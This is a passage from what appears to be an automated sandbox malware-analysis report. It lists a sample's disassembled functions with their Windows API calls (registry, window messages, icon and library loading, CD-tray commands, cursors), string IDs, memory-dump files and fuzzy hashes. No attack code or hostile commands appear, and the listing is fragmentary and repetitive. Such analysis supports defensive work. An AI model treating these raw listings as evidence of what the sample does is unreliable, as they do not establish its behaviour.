                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAD2E1
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAD2EE
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00AAD3C0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                • Opcode ID: 7ddbb827f11e74d77c02c451d75f031b7e2e3485a0639c089513435becb346be
                                                                                                                                                                                                                                                                • Instruction ID: c61b5c36d3da7c69ae435a10c0ca8c6480ff7209b5b9fd138ed3575062dacba3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ddbb827f11e74d77c02c451d75f031b7e2e3485a0639c089513435becb346be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B1278356042119FDB14DF18C981B6AB7E5FF89714F0488ADF88A9B3A2DB35ED41CB81
                                                                                                                                                                                                                                                                Function 00AB13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AB1462
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB149D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AB14F0
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB1526
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB15A2
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB161D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A83535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A83547
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                • Opcode ID: d8afc4d254d88f1396b7ad48abe05c56fcf1ed933232e4c4e76b5bdd94686fec
                                                                                                                                                                                                                                                                • Instruction ID: ee541ccd9ab18e549e475dd3f0436594371cd9093a071e1d343fde3f1e35ca5e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8afc4d254d88f1396b7ad48abe05c56fcf1ed933232e4c4e76b5bdd94686fec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E1B1726043418FCB14EF29C5608AAB7E6FF98314F54896CF8969B362DB34ED45CB81
                                                                                                                                                                                                                                                                Function 00AAD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                • Opcode ID: e4faa78330d00d9833c154ec8232cfbf6a492faf3e27349cdd46ee7fe81413c2
                                                                                                                                                                                                                                                                • Instruction ID: fd8076e0e9715de40dd304c48b292a4d6c9236d526ce136d9b1c442993542a33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4faa78330d00d9833c154ec8232cfbf6a492faf3e27349cdd46ee7fe81413c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB71E772A105278BCB109F7CCA405FE33A1AF66758F250124F8ABAB6D4EB35DD45C390
                                                                                                                                                                                                                                                                Function 00AB8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DB5
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DC9
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8DEC
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB8E0F
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AB8E4D
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AB6691), ref: 00AB8EA9
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AB8EE2
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AB8F25
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AB8F5C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00AB8F68
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AB8F78
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,00AB6691), ref: 00AB8F87
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AB8FA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AB8FB0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                • Opcode ID: b23e0e96ce01cf143618ff41e475b391ea9dffc7d69b76314eb7991e9b1b809f
                                                                                                                                                                                                                                                                • Instruction ID: 4ff74bafb2e75f03d4817c4222102ef3495e29762b9ad182e0c0c0df63565c9b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b23e0e96ce01cf143618ff41e475b391ea9dffc7d69b76314eb7991e9b1b809f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A61AB71900615BAEB14DFA8DC45BFE77ACBF08B10F104616F815E61D2EB78E991CBA0
                                                                                                                                                                                                                                                                Function 00A948BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00A9493D
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94948
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A9499F
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A949DD
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00A94A1B
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94A63
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94A9E
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A94ACC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                • Opcode ID: f30325fe27f9fb9c2e3ba43465d1690d814981ed036d5af7da278ebe984dd60b
                                                                                                                                                                                                                                                                • Instruction ID: f0bc29b6d43cb90d2142668a9e0dc2ebb8ce40bb0d6546c4e82d847ac781e28d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f30325fe27f9fb9c2e3ba43465d1690d814981ed036d5af7da278ebe984dd60b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71E0726086119FCB10EF28D98096FB7E8FF98758F10492DF89697261EB30DD46CB91
                                                                                                                                                                                                                                                                Function 00A86382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 00A86395
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A863A7
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00A863BE
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00A863D3
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00A863D9
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A863E9
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00A863EF
                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A86410
                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A8642A
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A86433
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8649A
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00A864D6
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A864DC
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00A864E3
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A8653A
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A86547
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A8656C
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A86596
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 895679908-0
                                                                                                                                                                                                                                                                • Opcode ID: f6e49fc3aa1b65d58487d9dc168d70158fcbf7c9dd746452c59606a398ee7674
                                                                                                                                                                                                                                                                • Instruction ID: bc2ed416cf01aefcd9bee9b6040efbaa19bdd5a8f2cc761ba9e8884edb7b0077
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e49fc3aa1b65d58487d9dc168d70158fcbf7c9dd746452c59606a398ee7674
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39718F31900705AFEB20EFA8CE45BAEBBF5FF48704F100A18E586A65A0DB75E945CB50
                                                                                                                                                                                                                                                                Function 00AA086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00AA0884
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00AA088F
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00AA089A
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00AA08A5
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00AA08B0
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00AA08BB
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00AA08C6
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00AA08D1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00AA08DC
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00AA08E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00AA08F2
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00AA08FD
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00AA0908
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00AA0913
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00AA091E
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00AA0929
                                                                                                                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 00AA0939
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AA097B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ea83ed2870ddb770586ea6bbc495e94bfe342f90224fab7e00e180c8ea9cceb
                                                                                                                                                                                                                                                                • Instruction ID: 10da52d3c7a8e4bf91414793c040be3c4ceccd6237deedd794e13106b37dbb23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ea83ed2870ddb770586ea6bbc495e94bfe342f90224fab7e00e180c8ea9cceb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F44142B0D083196ADB10DFBA8C89C6EBFE8FF04754B50452AE15CEB291DB789901CF91
                                                                                                                                                                                                                                                                Function 00A40436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A40436
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00AF170C,00000FA0,22926BF9,?,?,?,?,00A62733,000000FF), ref: 00A4048C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A62733,000000FF), ref: 00A40497
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A62733,000000FF), ref: 00A404A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A404BE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A404CC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A404DA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A40505
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A40510
                                                                                                                                                                                                                                                                • ___scrt_fastfail.LIBCMT ref: 00A40457
                                                                                                                                                                                                                                                                  • Part of subcall function 00A40413: __onexit.LIBCMT ref: 00A40419
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00A404C4
                                                                                                                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00A404D2
                                                                                                                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A40492
                                                                                                                                                                                                                                                                • kernel32.dll, xrefs: 00A404A3
                                                                                                                                                                                                                                                                • InitializeConditionVariable, xrefs: 00A404B8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                • Opcode ID: 9abbfac88002f9ded27c7e9a08a339c3b0b86f930e14d5c12910ac6dee566308
                                                                                                                                                                                                                                                                • Instruction ID: a49f1a014232a647f9d44a27c7905f81ae814cff589a263b2fe6bfab73a48aa2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9abbfac88002f9ded27c7e9a08a339c3b0b86f930e14d5c12910ac6dee566308
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2213B3AA40704BBD711ABE8AC46F6933A8FB84B61F000729FB06D7290EF749C019E51
                                                                                                                                                                                                                                                                Function 00A83A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                • Opcode ID: e98bfa21796080c17a3d6408b7c53a179a2cc34f40eed585c013dc84c73d116b
                                                                                                                                                                                                                                                                • Instruction ID: 533a4ae7e94228c7fe541d770cdc5986e3a359e1afd3133c3f1ed00f3ff8c256
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e98bfa21796080c17a3d6408b7c53a179a2cc34f40eed585c013dc84c73d116b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77E11373E00516AFCF18AFB8C9416EEFBB0BF54B50F144529E456E7240EB30AE598790
                                                                                                                                                                                                                                                                Function 00A94F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(00000000,00000000,00ABDCD0), ref: 00A94F6C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94F80
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A94FDE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A95039
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A95084
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A950EC
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3FD52: _wcslen.LIBCMT ref: 00A3FD5D
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,00AE7C10,00000061), ref: 00A95188
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
